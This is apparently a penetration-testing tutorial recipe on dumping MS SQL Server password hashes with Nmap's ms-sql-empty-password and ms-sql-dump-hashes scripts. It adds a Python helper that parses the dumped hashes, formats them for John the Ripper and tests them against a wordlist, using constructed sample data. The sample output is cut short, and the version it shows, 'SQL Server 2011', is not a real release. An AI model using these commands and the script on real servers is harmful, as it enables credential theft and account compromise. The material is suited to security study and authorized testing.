Dumping password hashes of MS SQL servers
After gaining access to an MS SQL server, we can dump the password hashes of all its logins and use them to compromise other accounts, on this server and on any other system where the same passwords are reused. Nmap can retrieve these hashes in a format that popular cracking tools such as John the Ripper accept directly.
This recipe shows how to dump password hashes of an MS SQL server with Nmap.
How to do it...
To dump all the password hashes of an MS SQL server whose system administrator (sa) account has an empty password, run the following Nmap command. The ms-sql-empty-password script finds the working login, and ms-sql-dump-hashes reuses it; the login needs enough privilege to read the stored hashes, which sa has. If you already hold valid credentials, pass them with the script arguments mssql.username and mssql.password instead:
$ nmap -p1433 --script ms-sql-empty-password,ms-sql-dump-hashes <target>
The password hashes will be included in the script output section:
PORT     STATE SERVICE  VERSION
1433/tcp open  ms-sql-s Microsoft SQL Server 2011
Service Info: CPE: cpe:/o:microsoft:windows

Host script results:
| ms-sql-empty-password:
|   [192.168.1.102\MSSQLSERVER]
|_    sa:<empty> => Login Success
| ms...
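The hashes that ms-sql-dump-hashes prints are the raw values SQL Server stores, and knowing their layout lets you check them without a full cracking run. The following Python script is an added example, not code from the Nmap project or from this book: it builds hashes in the two documented SQL Server layouts (0x0100 with a 4-byte salt and SHA-1 over the UTF-16LE password plus salt, used by SQL Server 2005 and 2008; 0x0200 with a 4-byte salt and SHA-512, used by SQL Server 2012 and later), extracts user:hash lines from Nmap script output, writes them in the one-per-line form John the Ripper reads, and tests a short wordlist against each hash. The sample Nmap output, the salts and the passwords are constructed for the example; the helper names are mine.

```python
import hashlib
import re
from typing import Dict, Iterable, Optional

# Stored-hash layouts: 0x + version + 4-byte salt (hex) + digest (hex).
#   0100 -> SHA-1   over UTF-16LE(password) + salt   (SQL Server 2005/2008, John format mssql05)
#   0200 -> SHA-512 over UTF-16LE(password) + salt   (SQL Server 2012+,     John format mssql12)
_DIGEST_BY_VERSION = {"0100": "sha1", "0200": "sha512"}


def mssql_hash(password: str, salt: bytes, version: str = "0100") -> str:
    """Build a SQL Server login hash in the given layout (hex upper-case, as SQL Server shows it)."""
    if len(salt) != 4 or version not in _DIGEST_BY_VERSION:
        raise ValueError("salt must be 4 bytes and version must be 0100 or 0200")
    digest = hashlib.new(_DIGEST_BY_VERSION[version], password.encode("utf-16-le") + salt)
    return "0x" + version + salt.hex().upper() + digest.hexdigest().upper()


def check_password(candidate: str, stored: str) -> bool:
    """Return True if candidate produces the stored hash (salt and version are read from the hash)."""
    stored = stored.strip()
    version = stored[2:6]
    if not stored.lower().startswith("0x") or version not in _DIGEST_BY_VERSION:
        return False
    expected_len = 14 + 2 * hashlib.new(_DIGEST_BY_VERSION[version]).digest_size
    if len(stored) != expected_len:
        return False  # truncated or padded value, never a match
    salt = bytes.fromhex(stored[6:14])
    return mssql_hash(candidate, salt, version).lower() == stored.lower()


# Matches the "|   user:0x0100..." lines inside an Nmap script output block.
_HASH_LINE = re.compile(r"^\|[_ ]?\s*([^:\s]+):(0x0[12]00[0-9A-Fa-f]+)\s*$")


def parse_dump_hashes(nmap_output: str) -> Dict[str, str]:
    """Extract login name -> stored hash from ms-sql-dump-hashes output."""
    found: Dict[str, str] = {}
    for line in nmap_output.splitlines():
        m = _HASH_LINE.match(line)
        if m:
            found[m.group(1)] = m.group(2)
    return found


def to_john_input(hashes: Dict[str, str]) -> str:
    """One 'user:hash' line per login, the shape John the Ripper reads from a file."""
    return "".join(f"{user}:{h}\n" for user, h in hashes.items())


def try_wordlist(stored: str, words: Iterable[str]) -> Optional[str]:
    """Return the first word that matches the stored hash, or None."""
    for word in words:
        if check_password(word, stored):
            return word
    return None


# Constructed sample in the shape of the script output; salts and passwords are made up.
SALT_SA = bytes.fromhex("A1B2C3D4")
SALT_APP = bytes.fromhex("00112233")
SAMPLE_NMAP_OUTPUT = (
    "| ms-sql-dump-hashes:\n"
    "| [192.168.1.102\\MSSQLSERVER]\n"
    f"|   sa:{mssql_hash('Password1', SALT_SA)}\n"
    f"|_  appuser:{mssql_hash('Summer2012!', SALT_APP, '0200')}\n"
)
WORDLIST = ["password", "Password1", "Summer2012!"]


if __name__ == "__main__":
    hashes = parse_dump_hashes(SAMPLE_NMAP_OUTPUT)
    print(to_john_input(hashes), end="")
    for user, stored in hashes.items():
        print(f"{user}: {try_wordlist(stored, WORDLIST)}")
```

Write the output of to_john_input to a file and feed it to John with --format=mssql05 for 0x0100 hashes or --format=mssql12 for 0x0200 hashes; the version prefix tells you which one a server uses. The length check in check_password matters in practice because Nmap output copied from a terminal is often wrapped or truncated, and a short hash should be reported as unusable rather than silently never matching.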